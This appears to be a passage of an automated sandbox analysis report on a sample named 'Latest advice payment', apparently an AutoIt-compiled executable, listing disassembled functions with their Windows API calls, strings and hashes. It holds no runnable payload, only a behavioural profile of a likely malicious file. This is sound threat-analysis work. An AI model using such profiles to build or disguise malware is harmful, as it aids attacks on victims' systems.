                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 984253442-2268648507
                                                            • Opcode ID: 4fb1e6399800544153f021440ec97864a974dc128d6d307de394f8e1ecb77eaf
                                                            • Instruction ID: 7b4a79878eb9961269a251a413c15c6852c7131bd87882648df433bba0f20eaf
                                                            • Opcode Fuzzy Hash: 4fb1e6399800544153f021440ec97864a974dc128d6d307de394f8e1ecb77eaf
                                                            • Instruction Fuzzy Hash: 80412C7280450EAACB15FBE0DD8ADEEBB79BF98304F500465B505B70A1EE316F49CB61
                                                            Function 005EBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,005E9207,?,?), ref: 005EBA56
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA78
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 005EBA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 005EBAA6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,005F2CAC,?), ref: 005EBAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 005EBAE7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 005EBB0B
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 005EBB36
                                                            • DeleteObject.GDI32(00000000), ref: 005EBB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005EBB74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: b1ab1fc20d0ed900053d3e04a02237545e97994589514dfbcea3fbfbf2c9beac
                                                            • Instruction ID: e0cb31f75e89417ca5ff68bfa85e752d04a03f49034988bbc6b3539ffe7b2915
                                                            • Opcode Fuzzy Hash: b1ab1fc20d0ed900053d3e04a02237545e97994589514dfbcea3fbfbf2c9beac
                                                            • Instruction Fuzzy Hash: 67414B75500248FFDB199F65DC88EAB7BB8FB99712F104068F985DB260DB309E05DB60
                                                            Function 005CD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 005CDA10
                                                            • _wcscat.LIBCMT ref: 005CDA28
                                                            • _wcscat.LIBCMT ref: 005CDA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005CDA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 005CDA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 005CDA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDAA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: e71d1332f65356fd4ed66cfef8d2dffd10ec20041653a8e40114ada1b98f0786
                                                            • Instruction ID: 4839b870132e7732731fa414dd4a801e527ddb4522de2f29143c0f332a567bd9
                                                            • Opcode Fuzzy Hash: e71d1332f65356fd4ed66cfef8d2dffd10ec20041653a8e40114ada1b98f0786
                                                            • Instruction Fuzzy Hash: 588171755042419FCB24EFA4C885E6ABBF8BF89314F144C3EF889DB251EA30D945CB62
                                                            Function 005EC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005EC1FC
                                                            • GetFocus.USER32 ref: 005EC20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 005EC217
                                                            • _memset.LIBCMT ref: 005EC342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 005EC36D
                                                            • GetMenuItemCount.USER32(?), ref: 005EC38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 005EC3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 005EC3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005EC41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005EC454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 005EC489
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: d14f2169e33a8f2b4637cbbbe662f932a4093b7fdb1d6d09fed59417bab99578
                                                            • Instruction ID: 5d665603fce86b8681531dbb919c6530d37ee7658b894d9c529419900be346d1
                                                            • Opcode Fuzzy Hash: d14f2169e33a8f2b4637cbbbe662f932a4093b7fdb1d6d09fed59417bab99578
                                                            • Instruction Fuzzy Hash: 65816B712083919FDB28DF15C894A6BBFE9FB88714F00492EF9D597291C770D906CB52
                                                            Function 005D731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005D738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 005D739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 005D73A7
                                                            • SelectObject.GDI32(00000000,?), ref: 005D73B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 005D7408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 005D7444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 005D7468
                                                            • SelectObject.GDI32(00000006,?), ref: 005D7470
                                                            • DeleteObject.GDI32(?), ref: 005D7479
                                                            • DeleteDC.GDI32(00000006), ref: 005D7480
                                                            • ReleaseDC.USER32(00000000,?), ref: 005D748B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 9709492f051e64cbcfabc0ef03ba360c11befcb001dc99079dbf19905b7d0153
                                                            • Instruction ID: cd90571a37b6178aa0d801007c4d114d2d468f29cdb6d5da6912aaae87c0f89e
                                                            • Opcode Fuzzy Hash: 9709492f051e64cbcfabc0ef03ba360c11befcb001dc99079dbf19905b7d0153
                                                            • Instruction Fuzzy Hash: 9A513C71904249EFCB25CFA8CC88EAEBBB9FF48310F14841EF99A97310D731A9449B50
                                                            Function 00566A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00580957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00566B0C,?,00008000), ref: 00580973
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00566BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00566CFA
                                                              • Part of subcall function 0056586D: _wcscpy.LIBCMT ref: 005658A5
                                                              • Part of subcall function 0058363D: _iswctype.LIBCMT ref: 00583645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 74d8f1edd6e84eab31ebcd5e1b0d24573311d57d4a87db9e6c759824c86431fc
                                                            • Instruction ID: 94a1bb53421bbe8ef3fa33bcf3921927c5d34c479f47e80028042a26bd76257d
                                                            • Opcode Fuzzy Hash: 74d8f1edd6e84eab31ebcd5e1b0d24573311d57d4a87db9e6c759824c86431fc
                                                            • Instruction Fuzzy Hash: AE0247311083429FCB24EF24C895AAFBFE5BFD9314F14491DF49A972A1DB309949CB52
                                                            Function 005C2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 005C2DDD
                                                            • GetMenuItemCount.USER32(00625890), ref: 005C2E66
                                                            • DeleteMenu.USER32(00625890,00000005,00000000,000000F5,?,?), ref: 005C2EF6
                                                            • DeleteMenu.USER32(00625890,00000004,00000000), ref: 005C2EFE
                                                            • DeleteMenu.USER32(00625890,00000006,00000000), ref: 005C2F06
                                                            • DeleteMenu.USER32(00625890,00000003,00000000), ref: 005C2F0E
                                                            • GetMenuItemCount.USER32(00625890), ref: 005C2F16
                                                            • SetMenuItemInfoW.USER32(00625890,00000004,00000000,00000030), ref: 005C2F4C
                                                            • GetCursorPos.USER32(?), ref: 005C2F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 005C2F5F
                                                            • TrackPopupMenuEx.USER32(00625890,00000000,?,00000000,00000000,00000000), ref: 005C2F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005C2F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: 26d582342d3e51ad94d2009ecca451c74e99883e8fd14632d557af8958e50497
                                                            • Instruction ID: 30cc72514e3cc54264911d8ce445fcae3de30e26722b777805fd470ed95fe3fa
                                                            • Opcode Fuzzy Hash: 26d582342d3e51ad94d2009ecca451c74e99883e8fd14632d557af8958e50497
                                                            • Instruction Fuzzy Hash: 3B71F57060020ABFEB259F95DC89FAABF68FF54364F14021EF615AA1E1CBB15C10DB91
                                                            Function 005D88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005D88D7
                                                            • CoInitialize.OLE32(00000000), ref: 005D8904
                                                            • CoUninitialize.OLE32 ref: 005D890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 005D8A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 005D8B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005F2C0C), ref: 005D8B6F
                                                            • CoGetObject.OLE32(?,00000000,005F2C0C,?), ref: 005D8B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 005D8BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005D8C25
                                                            • VariantClear.OLEAUT32(?), ref: 005D8C35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,_
                                                            • API String ID: 2395222682-217268573
                                                            • Opcode ID: 1366300051f52122f0a7a0861a899c2eedcefe2eab2a15f0889c31cfec4454d1
                                                            • Instruction ID: 68c49d648de52a4de979fc914c43d795ef60f317fd4d0972ed410f85cd88094c
                                                            • Opcode Fuzzy Hash: 1366300051f52122f0a7a0861a899c2eedcefe2eab2a15f0889c31cfec4454d1
                                                            • Instruction Fuzzy Hash: 1DC125B1208305AFD710DF68C88492ABBE9FF89348F00491EF5899B361DB71ED05CB52
                                                            Function 005B77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • _memset.LIBCMT ref: 005B786B
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005B78A0
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005B78BC
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005B78D8
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005B7902
                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 005B792A
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005B7935
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005B793A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 1411258926-22481851
                                                            • Opcode ID: 2f5cf2cbc2ba402cfa2a5aab85fcb0ffe0cbb3d3e449967e9be3d7dd240f0a38
                                                            • Instruction ID: 27ab7a2b64bc3d7c2fa6ca5ea758061029fe216dbc67822e4d69bd2a8b3a149f
                                                            • Opcode Fuzzy Hash: 2f5cf2cbc2ba402cfa2a5aab85fcb0ffe0cbb3d3e449967e9be3d7dd240f0a38
                                                            • Instruction Fuzzy Hash: CE411872C1462DAADF15EBA4DC89DEDBB78FF58714F044129F805A71A1EB306E04CB90
                                                            Function 005E0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 1fc0aca4e9af2a9390dcbb49c436a6a73ec4b7bef662c67c08c5845bcf609f36
                                                            • Instruction ID: c465d76b291e66053084b87431a8099b1269ac7b487a3ab261ef509a085c5cad
                                                            • Opcode Fuzzy Hash: 1fc0aca4e9af2a9390dcbb49c436a6a73ec4b7bef662c67c08c5845bcf609f36
                                                            • Instruction Fuzzy Hash: 6741613510028A8BCF18EF11D86AAEE3F65BF55304F545454FCE52B2D1DB709DAACBA0
                                                            Function 005BF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0059E2A0,00000010,?,Bad directive syntax error,005EF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 005BF7C2
                                                            • LoadStringW.USER32(00000000,?,0059E2A0,00000010), ref: 005BF7C9
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • _wprintf.LIBCMT ref: 005BF7FC
                                                            • __swprintf.LIBCMT ref: 005BF81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005BF88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: af72362e0a914ad204543c921dee0c814a325688caa60b98a913eca9b3a26749
                                                            • Instruction ID: 14df7629776f7d8fa1a1738b7d6b1fe845c447274728d81f937de45c5c6cfcc2
                                                            • Opcode Fuzzy Hash: af72362e0a914ad204543c921dee0c814a325688caa60b98a913eca9b3a26749
                                                            • Instruction Fuzzy Hash: 56214F3295021EFFCF16EF90CC4AEED7B39BF18304F044865B915660A1EA71AA58DB50
                                                            Function 005C52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                              • Part of subcall function 00567924: _memmove.LIBCMT ref: 005679AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005C5330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005C5346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005C5357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005C5369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005C537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: c350847f477ab296336fa54f98c1d3b83a8800e5a9a92a722aeb6d5e3bb103e5
                                                            • Instruction ID: 72d293d872d0fb6d0de79bd1082a1b158450e9c3ff65efba0226eb1a59bf66af
                                                            • Opcode Fuzzy Hash: c350847f477ab296336fa54f98c1d3b83a8800e5a9a92a722aeb6d5e3bb103e5
                                                            • Instruction Fuzzy Hash: 0711632195015E7DD720BAB1CC49DFF7EBDFBE5B84F1508197411930D1EEA01D84C5A0
                                                            Function 005C46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: 76acc4cad634f9c948f8036208b6fac787ed1143fc5bd5bcaa8971ec152c766a
                                                            • Instruction ID: f1206715c84e8c640bc618dd63d2e9e417bb3ad688b06eef5788f41e97ba373f
                                                            • Opcode Fuzzy Hash: 76acc4cad634f9c948f8036208b6fac787ed1143fc5bd5bcaa8971ec152c766a
                                                            • Instruction Fuzzy Hash: 9D11C6315041156FDB14AB709C8AEDA7FBCFB51711F0405B9F845E6091EF709A869B50
                                                            Function 005C4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 005C4F7A
                                                              • Part of subcall function 0058049F: timeGetTime.WINMM(?,7694B400,00570E7B), ref: 005804A3
                                                            • Sleep.KERNEL32(0000000A), ref: 005C4FA6
